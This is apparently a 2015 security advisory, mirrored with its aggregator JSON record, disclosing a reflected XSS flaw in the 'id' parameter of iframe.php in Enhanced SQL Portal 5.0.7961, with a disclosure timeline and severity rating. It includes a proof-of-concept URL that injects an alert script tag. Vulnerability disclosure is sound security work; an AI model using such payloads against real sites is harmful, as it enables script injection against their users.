Enhanced SQL Portal 5.0.7961 XSS Vulnerability

2015-06-08T00:00:00

Description

[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt Vendor: www.eliacom.com www.eliacom.com/mysql-gui-download.php Product: Enhanced SQL Portal 5.0.7961 web based MySQL administration application. Advisory Information: ================================================ Enhanced SQL Portal 5.0.7961 XSS Vulnerability Vulnerability Details: ===================== iframe.php contains an XSS vulnerability Exploit code(s): =============== http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script> Disclosure Timeline: ========================================================= Vendor Notification: May 28, 2015 June 2, 2015 : Public Disclosure Severity Level: ========================================================= Med Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] Enhanced SQL Portal 5.0.7961 Vulnerable Parameter(s): [+] id Affected Area(s): [+] iframe =============================================================== (hyp3rlinx)

{"id": "SECURITYVULNS:DOC:32185", "bulletinFamily": "software", "title": "Enhanced SQL Portal 5.0.7961 XSS Vulnerability", "description": "\r\n\r\n[+] Credits: John Page ( hyp3rlinx )\r\n\r\n[+] Domains: hyp3rlinx.altervista.org\r\n\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt\r\n\r\n\r\n\r\nVendor:\r\nwww.eliacom.com\r\nwww.eliacom.com/mysql-gui-download.php\r\n\r\n\r\n\r\nProduct:\r\nEnhanced SQL Portal 5.0.7961 web based MySQL administration application.\r\n\r\n\r\n\r\nAdvisory Information:\r\n================================================\r\nEnhanced SQL Portal 5.0.7961 XSS Vulnerability\r\n\r\n\r\n\r\n\r\nVulnerability Details:\r\n=====================\r\niframe.php contains an XSS vulnerability\r\n\r\n\r\n\r\nExploit code(s):\r\n===============\r\n\r\n\r\nhttp://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script>\r\n \r\n\r\n\r\nDisclosure Timeline:\r\n=========================================================\r\n\r\n\r\nVendor Notification: May 28, 2015\r\nJune 2, 2015 : Public Disclosure\r\n\r\n\r\nSeverity Level:\r\n=========================================================\r\nMed\r\n\r\n\r\n\r\nDescription:\r\n==========================================================\r\n\r\nRequest Method(s):\r\n [+] GET\r\n\r\nVulnerable Product:\r\n [+] Enhanced SQL Portal 5.0.7961 \r\n\r\nVulnerable Parameter(s):\r\n [+] id\r\n\r\nAffected Area(s):\r\n [+] iframe\r\n\r\n===============================================================\r\n\r\n(hyp3rlinx)\r\n\r\n", "published": "2015-06-08T00:00:00", "modified": "2015-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32185", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:59", "edition": 1, "viewCount": 10, "enchantments": {"score": {"value": 1.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}]}, "exploitation": null, "vulnersScore": 1.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645317814}}